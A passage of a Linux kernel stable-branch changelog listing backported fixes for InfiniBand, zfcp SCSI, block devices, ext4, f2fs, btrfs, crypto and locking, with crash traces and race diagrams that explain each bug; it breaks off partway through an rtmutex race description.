Bart Van Assche [Mon, 21 Nov 2016 18:22:17 +0000 (10:22 -0800)]
IB/multicast: Check ib_find_pkey() return value
commit
d3a2418ee36a59bc02e9d454723f3175dcf4bfd9 upstream.
This patch avoids that Coverity complains about not checking the
ib_find_pkey() return value.
Fixes: commit
547af76521b3 ("IB/multicast: Report errors on multicast groups if P_key changes")
Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Cc: Sean Hefty <sean.hefty@intel.com>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Bart Van Assche [Mon, 21 Nov 2016 18:21:17 +0000 (10:21 -0800)]
IB/mad: Fix an array index check
commit
2fe2f378dd45847d2643638c07a7658822087836 upstream.
The array ib_mad_mgmt_class_table.method_table has MAX_MGMT_CLASS
(80) elements. Hence compare the array index with that value instead
of with IB_MGMT_MAX_METHODS (128). This patch avoids that Coverity
reports the following:
Overrunning array class->method_table of 80 8-byte elements at element index 127 (byte offset 1016) using index convert_mgmt_class(mad_hdr->mgmt_class) (which evaluates to 127).
Fixes: commit
b7ab0b19a85f ("IB/mad: Verify mgmt class in received MADs")
Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Cc: Sean Hefty <sean.hefty@intel.com>
Reviewed-by: Hal Rosenstock <hal@mellanox.com>
Signed-off-by: Doug Ledford <dledford@redhat.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Steven Rostedt (Red Hat) [Thu, 8 Dec 2016 17:48:26 +0000 (12:48 -0500)]
ftrace/x86_32: Set ftrace_stub to weak to prevent gcc from using short jumps to it
commit
847fa1a6d3d00f3bdf68ef5fa4a786f644a0dd67 upstream.
With new binutils, gcc may get smart with its optimization and change a jmp
from a 5 byte jump to a 2 byte one even though it was jumping to a global
function. But that global function existed within a 2 byte radius, and gcc
was able to optimize it. Unfortunately, that jump was also being modified
when function graph tracing begins. Since ftrace expected that jump to be 5
bytes, but it was only two, it overwrote code after the jump, causing a
crash.
This was fixed for x86_64 with commit
8329e818f149, with the same subject as
this commit, but nothing was done for x86_32.
Fixes:
d61f82d06672 ("ftrace: use dynamic patching for updating mcount calls")
Reported-by: Colin Ian King <colin.king@canonical.com>
Tested-by: Colin Ian King <colin.king@canonical.com>
Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Steffen Maier [Fri, 9 Dec 2016 16:16:33 +0000 (17:16 +0100)]
scsi: zfcp: fix rport unblock race with LUN recovery
commit
6f2ce1c6af37191640ee3ff6e8fc39ea10352f4c upstream.
It is unavoidable that zfcp_scsi_queuecommand() has to finish requests
with DID_IMM_RETRY (like fc_remote_port_chkready()) during the time
window when zfcp detected an unavailable rport but
fc_remote_port_delete(), which is asynchronous via
zfcp_scsi_schedule_rport_block(), has not yet blocked the rport.
However, for the case when the rport becomes available again, we should
prevent unblocking the rport too early. In contrast to other FCP LLDDs,
zfcp has to open each LUN with the FCP channel hardware before it can
send I/O to a LUN. So if a port already has LUNs attached and we
unblock the rport just after port recovery, recoveries of LUNs behind
this port can still be pending which in turn force
zfcp_scsi_queuecommand() to unnecessarily finish requests with
DID_IMM_RETRY.
This also opens a time window with unblocked rport (until the followup
LUN reopen recovery has finished). If a scsi_cmnd timeout occurs during
this time window fc_timed_out() cannot work as desired and such command
would indeed time out and trigger scsi_eh. This prevents a clean and
timely path failover. This should not happen if the path issue can be
recovered on FC transport layer such as path issues involving RSCNs.
Fix this by only calling zfcp_scsi_schedule_rport_register(), to
asynchronously trigger fc_remote_port_add(), after all LUN recoveries as
children of the rport have finished and no new recoveries of equal or
higher order were triggered meanwhile. Finished intentionally includes
any recovery result no matter if successful or failed (still unblock
rport so other successful LUNs work). For simplicity, we check after
each finished LUN recovery if there is another LUN recovery pending on
the same port and then do nothing. We handle the special case of a
successful recovery of a port without LUN children the same way without
changing this case's semantics.
For debugging we introduce 2 new trace records written if the rport
unblock attempt was aborted due to still unfinished or freshly triggered
recovery. The records are only written above the default trace level.
Benjamin noticed the important special case of new recovery that can be
triggered between having given up the erp_lock and before calling
zfcp_erp_action_cleanup() within zfcp_erp_strategy(). We must avoid the
following sequence:
ERP thread rport_work other context
------------------------- -------------- --------------------------------
port is unblocked, rport still blocked,
due to pending/running ERP action,
so ((port->status & ...UNBLOCK) != 0)
and (port->rport == NULL)
unlock ERP
zfcp_erp_action_cleanup()
case ZFCP_ERP_ACTION_REOPEN_LUN:
zfcp_erp_try_rport_unblock()
((status & ...UNBLOCK) != 0) [OLD!]
zfcp_erp_port_reopen()
lock ERP
zfcp_erp_port_block()
port->status clear ...UNBLOCK
unlock ERP
zfcp_scsi_schedule_rport_block()
port->rport_task = RPORT_DEL
queue_work(rport_work)
zfcp_scsi_rport_work()
(port->rport_task != RPORT_ADD)
port->rport_task = RPORT_NONE
zfcp_scsi_rport_block()
if (!port->rport) return
zfcp_scsi_schedule_rport_register()
port->rport_task = RPORT_ADD
queue_work(rport_work)
zfcp_scsi_rport_work()
(port->rport_task == RPORT_ADD)
port->rport_task = RPORT_NONE
zfcp_scsi_rport_register()
(port->rport == NULL)
rport = fc_remote_port_add()
port->rport = rport;
Now the rport was erroneously unblocked while the zfcp_port is blocked.
This is another situation we want to avoid due to scsi_eh
potential. This state would at least remain until the new recovery from
the other context finished successfully, or potentially forever if it
failed. In order to close this race, we take the erp_lock inside
zfcp_erp_try_rport_unblock() when checking the status of zfcp_port or
LUN. With that, the possible corresponding rport state sequences would
be: (unblock[ERP thread],block[other context]) if the ERP thread gets
erp_lock first and still sees ((port->status & ...UNBLOCK) != 0),
(block[other context],NOP[ERP thread]) if the ERP thread gets erp_lock
after the other context has already cleard ...UNBLOCK from port->status.
Since checking fields of struct erp_action is unsafe because they could
have been overwritten (re-used for new recovery) meanwhile, we only
check status of zfcp_port and LUN since these are only changed under
erp_lock elsewhere. Regarding the check of the proper status flags (port
or port_forced are similar to the shown adapter recovery):
[zfcp_erp_adapter_shutdown()]
zfcp_erp_adapter_reopen()
zfcp_erp_adapter_block()
* clear UNBLOCK ---------------------------------------+
zfcp_scsi_schedule_rports_block() |
write_lock_irqsave(&adapter->erp_lock, flags);-------+ |
zfcp_erp_action_enqueue() | |
zfcp_erp_setup_act() | |
* set ERP_INUSE -----------------------------------|--|--+
write_unlock_irqrestore(&adapter->erp_lock, flags);--+ | |
.context-switch. | |
zfcp_erp_thread() | |
zfcp_erp_strategy() | |
write_lock_irqsave(&adapter->erp_lock, flags);------+ | |
... | | |
zfcp_erp_strategy_check_target() | | |
zfcp_erp_strategy_check_adapter() | | |
zfcp_erp_adapter_unblock() | | |
* set UNBLOCK -----------------------------------|--+ |
zfcp_erp_action_dequeue() | |
* clear ERP_INUSE ---------------------------------|-----+
... |
write_unlock_irqrestore(&adapter->erp_lock, flags);-+
Hence, we should check for both UNBLOCK and ERP_INUSE because they are
interleaved. Also we need to explicitly check ERP_FAILED for the link
down case which currently does not clear the UNBLOCK flag in
zfcp_fsf_link_down_info_eval().
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes:
8830271c4819 ("[SCSI] zfcp: Dont fail SCSI commands when transitioning to blocked fc_rport")
Fixes:
a2fa0aede07c ("[SCSI] zfcp: Block FC transport rports early on errors")
Fixes:
5f852be9e11d ("[SCSI] zfcp: Fix deadlock between zfcp ERP and SCSI")
Fixes:
338151e06608 ("[SCSI] zfcp: make use of fc_remote_port_delete when target port is unavailable")
Fixes:
3859f6a248cb ("[PATCH] zfcp: add rports to enable scsi_add_device to work again")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Steffen Maier [Fri, 9 Dec 2016 16:16:32 +0000 (17:16 +0100)]
scsi: zfcp: do not trace pure benign residual HBA responses at default level
commit
56d23ed7adf3974f10e91b643bd230e9c65b5f79 upstream.
Since quite a while, Linux issues enough SCSI commands per scsi_device
which successfully return with FCP_RESID_UNDER, FSF_FCP_RSP_AVAILABLE,
and SAM_STAT_GOOD. This floods the HBA trace area and we cannot see
other and important HBA trace records long enough.
Therefore, do not trace HBA response errors for pure benign residual
under counts at the default trace level.
This excludes benign residual under count combined with other validity
bits set in FCP_RSP_IU, such as FCP_SNS_LEN_VAL. For all those other
cases, we still do want to see both the HBA record and the corresponding
SCSI record by default.
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Fixes:
a54ca0f62f95 ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.")
Reviewed-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Benjamin Block [Fri, 9 Dec 2016 16:16:31 +0000 (17:16 +0100)]
scsi: zfcp: fix use-after-"free" in FC ingress path after TMF
commit
dac37e15b7d511e026a9313c8c46794c144103cd upstream.
When SCSI EH invokes zFCP's callbacks for eh_device_reset_handler() and
eh_target_reset_handler(), it expects us to relent the ownership over
the given scsi_cmnd and all other scsi_cmnds within the same scope - LUN
or target - when returning with SUCCESS from the callback ('release'
them). SCSI EH can then reuse those commands.
We did not follow this rule to release commands upon SUCCESS; and if
later a reply arrived for one of those supposed to be released commands,
we would still make use of the scsi_cmnd in our ingress tasklet. This
will at least result in undefined behavior or a kernel panic because of
a wrong kernel pointer dereference.
To fix this, we NULLify all pointers to scsi_cmnds (struct zfcp_fsf_req
*)->data in the matching scope if a TMF was successful. This is done
under the locks (struct zfcp_adapter *)->abort_lock and (struct
zfcp_reqlist *)->lock to prevent the requests from being removed from
the request-hashtable, and the ingress tasklet from making use of the
scsi_cmnd-pointer in zfcp_fsf_fcp_cmnd_handler().
For cases where a reply arrives during SCSI EH, but before we get a
chance to NULLify the pointer - but before we return from the callback
-, we assume that the code is protected from races via the CAS operation
in blk_complete_request() that is called in scsi_done().
The following stacktrace shows an example for a crash resulting from the
previous behavior:
Unable to handle kernel pointer dereference at virtual kernel address
fffffee17a672000
Oops: 0038 [#1] SMP
CPU: 2 PID: 0 Comm: swapper/2 Not tainted
task:
00000003f7ff5be0 ti:
00000003f3d38000 task.ti:
00000003f3d38000
Krnl PSW :
0404d00180000000 00000000001156b0 (smp_vcpu_scheduled+0x18/0x40)
R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:1 PM:0 EA:3
Krnl GPRS:
000000200000007e 0000000000000000 fffffee17a671fd8 0000000300000015
ffffffff80000000 00000000005dfde8 07000003f7f80e00 000000004fa4e800
000000036ce8d8f8 000000036ce8d9c0 00000003ece8fe00 ffffffff969c9e93
00000003fffffffd 000000036ce8da10 00000000003bf134 00000003f3b07918
Krnl Code:
00000000001156a2:
a7190000 lghi %r1,0
00000000001156a6:
a7380015 lhi %r3,21
#
00000000001156aa:
e32050000008 ag %r2,0(%r5)
>
00000000001156b0:
482022b0 lh %r2,688(%r2)
00000000001156b4:
ae123000 sigp %r1,%r2,0(%r3)
00000000001156b8:
b2220020 ipm %r2
00000000001156bc:
8820001c srl %r2,28
00000000001156c0:
c02700000001 xilf %r2,1
Call Trace:
([<
0000000000000000>] 0x0)
[<
000003ff807bdb8e>] zfcp_fsf_fcp_cmnd_handler+0x3de/0x490 [zfcp]
[<
000003ff807be30a>] zfcp_fsf_req_complete+0x252/0x800 [zfcp]
[<
000003ff807c0a48>] zfcp_fsf_reqid_check+0xe8/0x190 [zfcp]
[<
000003ff807c194e>] zfcp_qdio_int_resp+0x66/0x188 [zfcp]
[<
000003ff80440c64>] qdio_kick_handler+0xdc/0x310 [qdio]
[<
000003ff804463d0>] __tiqdio_inbound_processing+0xf8/0xcd8 [qdio]
[<
0000000000141fd4>] tasklet_action+0x9c/0x170
[<
0000000000141550>] __do_softirq+0xe8/0x258
[<
000000000010ce0a>] do_softirq+0xba/0xc0
[<
000000000014187c>] irq_exit+0xc4/0xe8
[<
000000000046b526>] do_IRQ+0x146/0x1d8
[<
00000000005d6a3c>] io_return+0x0/0x8
[<
00000000005d6422>] vtime_stop_cpu+0x4a/0xa0
([<
0000000000000000>] 0x0)
[<
0000000000103d8a>] arch_cpu_idle+0xa2/0xb0
[<
0000000000197f94>] cpu_startup_entry+0x13c/0x1f8
[<
0000000000114782>] smp_start_secondary+0xda/0xe8
[<
00000000005d6efe>] restart_int_handler+0x56/0x6c
[<
0000000000000000>] 0x0
Last Breaking-Event-Address:
[<
00000000003bf12e>] arch_spin_lock_wait+0x56/0xb0
Suggested-by: Steffen Maier <maier@linux.vnet.ibm.com>
Signed-off-by: Benjamin Block <bblock@linux.vnet.ibm.com>
Fixes:
ea127f9754 ("[PATCH] s390 (7/7): zfcp host adapter.") (tglx/history.git)
Signed-off-by: Steffen Maier <maier@linux.vnet.ibm.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Rabin Vincent [Thu, 1 Dec 2016 08:18:28 +0000 (09:18 +0100)]
block: protect iterate_bdevs() against concurrent close
commit
af309226db916e2c6e08d3eba3fa5c34225200c4 upstream.
If a block device is closed while iterate_bdevs() is handling it, the
following NULL pointer dereference occurs because bdev->b_disk is NULL
in bdev_get_queue(), which is called from blk_get_backing_dev_info() (in
turn called by the mapping_cap_writeback_dirty() call in
__filemap_fdatawrite_range()):
BUG: unable to handle kernel NULL pointer dereference at
0000000000000508
IP: [<
ffffffff81314790>] blk_get_backing_dev_info+0x10/0x20
PGD
9e62067 PUD
9ee8067 PMD 0
Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC
Modules linked in:
CPU: 1 PID: 2422 Comm: sync Not tainted 4.5.0-rc7+ #400
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996)
task:
ffff880009f4d700 ti:
ffff880009f5c000 task.ti:
ffff880009f5c000
RIP: 0010:[<
ffffffff81314790>] [<
ffffffff81314790>] blk_get_backing_dev_info+0x10/0x20
RSP: 0018:
ffff880009f5fe68 EFLAGS:
00010246
RAX:
0000000000000000 RBX:
ffff88000ec17a38 RCX:
ffffffff81a4e940
RDX:
7fffffffffffffff RSI:
0000000000000000 RDI:
ffff88000ec176c0
RBP:
ffff880009f5fe68 R08:
0000000000000000 R09:
0000000000000000
R10:
0000000000000001 R11:
0000000000000000 R12:
ffff88000ec17860
R13:
ffffffff811b25c0 R14:
ffff88000ec178e0 R15:
ffff88000ec17a38
FS:
00007faee505d700(0000) GS:
ffff88000fb00000(0000) knlGS:
0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0:
000000008005003b
CR2:
0000000000000508 CR3:
0000000009e8a000 CR4:
00000000000006e0
Stack:
ffff880009f5feb8 ffffffff8112e7f5 0000000000000000 7fffffffffffffff
0000000000000000 0000000000000000 7fffffffffffffff 0000000000000001
ffff88000ec178e0 ffff88000ec17860 ffff880009f5fec8 ffffffff8112e81f
Call Trace:
[<
ffffffff8112e7f5>] __filemap_fdatawrite_range+0x85/0x90
[<
ffffffff8112e81f>] filemap_fdatawrite+0x1f/0x30
[<
ffffffff811b25d6>] fdatawrite_one_bdev+0x16/0x20
[<
ffffffff811bc402>] iterate_bdevs+0xf2/0x130
[<
ffffffff811b2763>] sys_sync+0x63/0x90
[<
ffffffff815d4272>] entry_SYSCALL_64_fastpath+0x12/0x76
Code: 0f 1f 44 00 00 48 8b 87 f0 00 00 00 55 48 89 e5 <48> 8b 80 08 05 00 00 5d
RIP [<
ffffffff81314790>] blk_get_backing_dev_info+0x10/0x20
RSP <
ffff880009f5fe68>
CR2:
0000000000000508
---[ end trace
2487336ceb3de62d ]---
The crash is easily reproducible by running the following command, if an
msleep(100) is inserted before the call to func() in iterate_devs():
while :; do head -c1 /dev/nullb0; done > /dev/null & while :; do sync; done
Fix it by holding the bd_mutex across the func() call and only calling
func() if the bdev is opened.
Fixes:
5c0d6b60a0ba ("vfs: Create function for iterating over block devices")
Reported-and-tested-by: Wei Fang <fangwei1@huawei.com>
Signed-off-by: Rabin Vincent <rabinv@axis.com>
Signed-off-by: Jan Kara <jack@suse.cz>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Nicolai Stange [Sun, 20 Nov 2016 18:57:23 +0000 (19:57 +0100)]
f2fs: set ->owner for debugfs status file's file_operations
commit
05e6ea2685c964db1e675a24a4f4e2adc22d2388 upstream.
The struct file_operations instance serving the f2fs/status debugfs file
lacks an initialization of its ->owner.
This means that although that file might have been opened, the f2fs module
can still get removed. Any further operation on that opened file, releasing
included, will cause accesses to unmapped memory.
Indeed, Mike Marshall reported the following:
BUG: unable to handle kernel paging request at
ffffffffa0307430
IP: [<
ffffffff8132a224>] full_proxy_release+0x24/0x90
<...>
Call Trace:
[] __fput+0xdf/0x1d0
[] ____fput+0xe/0x10
[] task_work_run+0x8e/0xc0
[] do_exit+0x2ae/0xae0
[] ? __audit_syscall_entry+0xae/0x100
[] ? syscall_trace_enter+0x1ca/0x310
[] do_group_exit+0x44/0xc0
[] SyS_exit_group+0x14/0x20
[] do_syscall_64+0x61/0x150
[] entry_SYSCALL64_slow_path+0x25/0x25
<...>
---[ end trace
f22ae883fa3ea6b8 ]---
Fixing recursive fault but reboot is needed!
Fix this by initializing the f2fs/status file_operations' ->owner with
THIS_MODULE.
This will allow debugfs to grab a reference to the f2fs module upon any
open on that file, thus preventing it from getting removed.
Fixes:
902829aa0b72 ("f2fs: move proc files to debugfs")
Reported-by: Mike Marshall <hubcap@omnibond.com>
Reported-by: Martin Brandenburg <martin@omnibond.com>
Signed-off-by: Nicolai Stange <nicstange@gmail.com>
Signed-off-by: Jaegeuk Kim <jaegeuk@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Dan Carpenter [Sat, 10 Dec 2016 14:56:01 +0000 (09:56 -0500)]
ext4: return -ENOMEM instead of success
commit
578620f451f836389424833f1454eeeb2ffc9e9f upstream.
We should set the error code if kzalloc() fails.
Fixes:
67cf5b09a46f ("ext4: add the basic function for inline data support")
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Darrick J. Wong [Sat, 10 Dec 2016 14:55:01 +0000 (09:55 -0500)]
ext4: reject inodes with negative size
commit
7e6e1ef48fc02f3ac5d0edecbb0c6087cd758d58 upstream.
Don't load an inode with a negative size; this causes integer overflow
problems in the VFS.
[ Added EXT4_ERROR_INODE() to mark file system as corrupted. -TYT]
js: use EIO for 3.12 instead of EFSCORRUPTED.
Fixes:
a48380f769df (ext4: rename i_dir_acl to i_size_high)
Signed-off-by: Darrick J. Wong <darrick.wong@oracle.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Chandan Rajendra [Tue, 15 Nov 2016 02:26:26 +0000 (21:26 -0500)]
ext4: fix stack memory corruption with 64k block size
commit
30a9d7afe70ed6bd9191d3000e2ef1a34fb58493 upstream.
The number of 'counters' elements needed in 'struct sg' is
super_block->s_blocksize_bits + 2. Presently we have 16 'counters'
elements in the array. This is insufficient for block sizes >= 32k. In
such cases the memcpy operation performed in ext4_mb_seq_groups_show()
would cause stack memory corruption.
Fixes:
c9de560ded61f
Signed-off-by: Chandan Rajendra <chandan@linux.vnet.ibm.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Jan Kara <jack@suse.cz>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Chandan Rajendra [Tue, 15 Nov 2016 02:04:37 +0000 (21:04 -0500)]
ext4: fix mballoc breakage with 64k block size
commit
69e43e8cc971a79dd1ee5d4343d8e63f82725123 upstream.
'border' variable is set to a value of 2 times the block size of the
underlying filesystem. With 64k block size, the resulting value won't
fit into a 16-bit variable. Hence this commit changes the data type of
'border' to 'unsigned int'.
Fixes:
c9de560ded61f
Signed-off-by: Chandan Rajendra <chandan@linux.vnet.ibm.com>
Signed-off-by: Theodore Ts'o <tytso@mit.edu>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Alex Porosanu [Wed, 9 Nov 2016 08:46:11 +0000 (10:46 +0200)]
crypto: caam - fix AEAD givenc descriptors
commit
d128af17876d79b87edf048303f98b35f6a53dbc upstream.
The AEAD givenc descriptor relies on moving the IV through the
output FIFO and then back to the CTX2 for authentication. The
SEQ FIFO STORE could be scheduled before the data can be
read from OFIFO, especially since the SEQ FIFO LOAD needs
to wait for the SEQ FIFO LOAD SKIP to finish first. The
SKIP takes more time when the input is SG than when it's
a contiguous buffer. If the SEQ FIFO LOAD is not scheduled
before the STORE, the DECO will hang waiting for data
to be available in the OFIFO so it can be transferred to C2.
In order to overcome this, first force transfer of IV to C2
by starting the "cryptlen" transfer first and then starting to
store data from OFIFO to the output buffer.
Fixes:
1acebad3d8db8 ("crypto: caam - faster aead implementation")
Signed-off-by: Alex Porosanu <alexandru.porosanu@nxp.com>
Signed-off-by: Horia GeantÄ\83 <horia.geanta@nxp.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Willy Tarreau <w@1wt.eu>
NeilBrown [Mon, 12 Dec 2016 15:21:51 +0000 (08:21 -0700)]
block_dev: don't test bdev->bd_contains when it is not stable
commit
bcc7f5b4bee8e327689a4d994022765855c807ff upstream.
bdev->bd_contains is not stable before calling __blkdev_get().
When __blkdev_get() is called on a parition with ->bd_openers == 0
it sets
bdev->bd_contains = bdev;
which is not correct for a partition.
After a call to __blkdev_get() succeeds, ->bd_openers will be > 0
and then ->bd_contains is stable.
When FMODE_EXCL is used, blkdev_get() calls
bd_start_claiming() -> bd_prepare_to_claim() -> bd_may_claim()
This call happens before __blkdev_get() is called, so ->bd_contains
is not stable. So bd_may_claim() cannot safely use ->bd_contains.
It currently tries to use it, and this can lead to a BUG_ON().
This happens when a whole device is already open with a bd_holder (in
use by dm in my particular example) and two threads race to open a
partition of that device for the first time, one opening with O_EXCL and
one without.
The thread that doesn't use O_EXCL gets through blkdev_get() to
__blkdev_get(), gains the ->bd_mutex, and sets bdev->bd_contains = bdev;
Immediately thereafter the other thread, using FMODE_EXCL, calls
bd_start_claiming() from blkdev_get(). This should fail because the
whole device has a holder, but because bdev->bd_contains == bdev
bd_may_claim() incorrectly reports success.
This thread continues and blocks on bd_mutex.
The first thread then sets bdev->bd_contains correctly and drops the mutex.
The thread using FMODE_EXCL then continues and when it calls bd_may_claim()
again in:
BUG_ON(!bd_may_claim(bdev, whole, holder));
The BUG_ON fires.
Fix this by removing the dependency on ->bd_contains in
bd_may_claim(). As bd_may_claim() has direct access to the whole
device, it can simply test if the target bdev is the whole device.
Fixes:
6b4517a7913a ("block: implement bd_claiming and claiming block")
Signed-off-by: NeilBrown <neilb@suse.com>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Johan Hovold [Tue, 29 Nov 2016 15:55:01 +0000 (16:55 +0100)]
USB: serial: kl5kusb105: fix open error path
commit
6774d5f53271d5f60464f824748995b71da401ab upstream.
Kill urbs and disable read before returning from open on failure to
retrieve the line state.
Fixes:
1da177e4c3f4 ("Linux-2.6.12-rc2")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Robbie Ko [Fri, 7 Oct 2016 09:30:47 +0000 (17:30 +0800)]
Btrfs: fix tree search logic when replaying directory entry deletes
commit
2a7bf53f577e49c43de4ffa7776056de26db65d9 upstream.
If a log tree has a layout like the following:
leaf N:
...
item 240 key (282 DIR_LOG_ITEM 0) itemoff 8189 itemsize 8
dir log end
1275809046
leaf N + 1:
item 0 key (282 DIR_LOG_ITEM
3936149215) itemoff 16275 itemsize 8
dir log end
18446744073709551615
...
When we pass the value
1275809046 + 1 as the parameter start_ret to the
function tree-log.c:find_dir_range() (done by replay_dir_deletes()), we
end up with path->slots[0] having the value 239 (points to the last item
of leaf N, item 240). Because the dir log item in that position has an
offset value smaller than *start_ret (
1275809046 + 1) we need to move on
to the next leaf, however the logic for that is wrong since it compares
the current slot to the number of items in the leaf, which is smaller
and therefore we don't lookup for the next leaf but instead we set the
slot to point to an item that does not exist, at slot 240, and we later
operate on that slot which has unexpected content or in the worst case
can result in an invalid memory access (accessing beyond the last page
of leaf N's extent buffer).
So fix the logic that checks when we need to lookup at the next leaf
by first incrementing the slot and only after to check if that slot
is beyond the last item of the current leaf.
Signed-off-by: Robbie Ko <robbieko@synology.com>
Reviewed-by: Filipe Manana <fdmanana@suse.com>
Fixes:
e02119d5a7b4 (Btrfs: Add a write ahead tree log to optimize synchronous operations)
Signed-off-by: Filipe Manana <fdmanana@suse.com>
[Modified changelog for clarity and correctness]
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Michal Hocko [Wed, 7 Dec 2016 13:54:38 +0000 (14:54 +0100)]
hotplug: Make register and unregister notifier API symmetric
commit
777c6e0daebb3fcefbbd6f620410a946b07ef6d0 upstream.
Yu Zhao has noticed that __unregister_cpu_notifier only unregisters its
notifiers when HOTPLUG_CPU=y while the registration might succeed even
when HOTPLUG_CPU=n if MODULE is enabled. This means that e.g. zswap
might keep a stale notifier on the list on the manual clean up during
the pool tear down and thus corrupt the list. Resulting in the following
[ 144.964346] BUG: unable to handle kernel paging request at
ffff880658a2be78
[ 144.971337] IP: [<
ffffffffa290b00b>] raw_notifier_chain_register+0x1b/0x40
<snipped>
[ 145.122628] Call Trace:
[ 145.125086] [<
ffffffffa28e5cf8>] __register_cpu_notifier+0x18/0x20
[ 145.131350] [<
ffffffffa2a5dd73>] zswap_pool_create+0x273/0x400
[ 145.137268] [<
ffffffffa2a5e0fc>] __zswap_param_set+0x1fc/0x300
[ 145.143188] [<
ffffffffa2944c1d>] ? trace_hardirqs_on+0xd/0x10
[ 145.149018] [<
ffffffffa2908798>] ? kernel_param_lock+0x28/0x30
[ 145.154940] [<
ffffffffa2a3e8cf>] ? __might_fault+0x4f/0xa0
[ 145.160511] [<
ffffffffa2a5e237>] zswap_compressor_param_set+0x17/0x20
[ 145.167035] [<
ffffffffa2908d3c>] param_attr_store+0x5c/0xb0
[ 145.172694] [<
ffffffffa290848d>] module_attr_store+0x1d/0x30
[ 145.178443] [<
ffffffffa2b2b41f>] sysfs_kf_write+0x4f/0x70
[ 145.183925] [<
ffffffffa2b2a5b9>] kernfs_fop_write+0x149/0x180
[ 145.189761] [<
ffffffffa2a99248>] __vfs_write+0x18/0x40
[ 145.194982] [<
ffffffffa2a9a412>] vfs_write+0xb2/0x1a0
[ 145.200122] [<
ffffffffa2a9a732>] SyS_write+0x52/0xa0
[ 145.205177] [<
ffffffffa2ff4d97>] entry_SYSCALL_64_fastpath+0x12/0x17
This can be even triggered manually by changing
/sys/module/zswap/parameters/compressor multiple times.
Fix this issue by making unregister APIs symmetric to the register so
there are no surprises.
[js] backport to 3.12
Fixes:
47e627bc8c9a ("[PATCH] hotplug: Allow modules to use the cpu hotplug notifiers even if !CONFIG_HOTPLUG_CPU")
Reported-and-tested-by: Yu Zhao <yuzhao@google.com>
Signed-off-by: Michal Hocko <mhocko@suse.com>
Cc: linux-mm@kvack.org
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Dan Streetman <ddstreet@ieee.org>
Link: http://lkml.kernel.org/r/20161207135438.4310-1-mhocko@kernel.org
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Boris Brezillon [Fri, 28 Oct 2016 15:12:28 +0000 (17:12 +0200)]
m68k: Fix ndelay() macro
commit
7e251bb21ae08ca2e4fb28cc0981fac2685a8efa upstream.
The current ndelay() macro definition has an extra semi-colon at the
end of the line thus leading to a compilation error when ndelay is used
in a conditional block without curly braces like this one:
if (cond)
ndelay(t);
else
...
which, after the preprocessor pass gives:
if (cond)
m68k_ndelay(t);;
else
...
thus leading to the following gcc error:
error: 'else' without a previous 'if'
Remove this extra semi-colon.
Signed-off-by: Boris Brezillon <boris.brezillon@free-electrons.com>
Fixes:
c8ee038bd1488 ("m68k: Implement ndelay() based on the existing udelay() logic")
Signed-off-by: Geert Uytterhoeven <geert@linux-m68k.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
Thomas Gleixner [Wed, 30 Nov 2016 21:04:41 +0000 (21:04 +0000)]
locking/rtmutex: Prevent dequeue vs. unlock race
commit
dbb26055defd03d59f678cb5f2c992abe05b064a upstream.
David reported a futex/rtmutex state corruption. It's caused by the
following problem:
CPU0 CPU1 CPU2
l->owner=T1
rt_mutex_lock(l)
lock(l->wait_lock)
l->owner = T1 | HAS_WAITERS;
enqueue(T2)
boost()
unlock(l->wait_lock)
schedule()
rt_mutex_lock(l)
lock(l->wait_lock)
l->owner = T1 | HAS_WAITERS;
enqueue(T3)
boost()
unlock(l->wait_lock)
schedule()
signal(->T2) signal(->T3)
lock(l->wait_lock)
dequeue(T2)
deboost()
unlock(l->wait_lock)
lock(l->wait_lock)
dequeue(T3)
===> wait list is now empty
deboost()
unlock(l->wait_lock)
lock(l->wait_lock)
fixup_rt_mutex_waiters()
if (wait_list_empty(l)) {
owner = l->owner & ~HAS_WAITERS;
l->owner = owner
==> l->owner = T1
}
lock(l->wait_lock)
rt_mutex_unlock(l) fixup_rt_mutex_waiters()
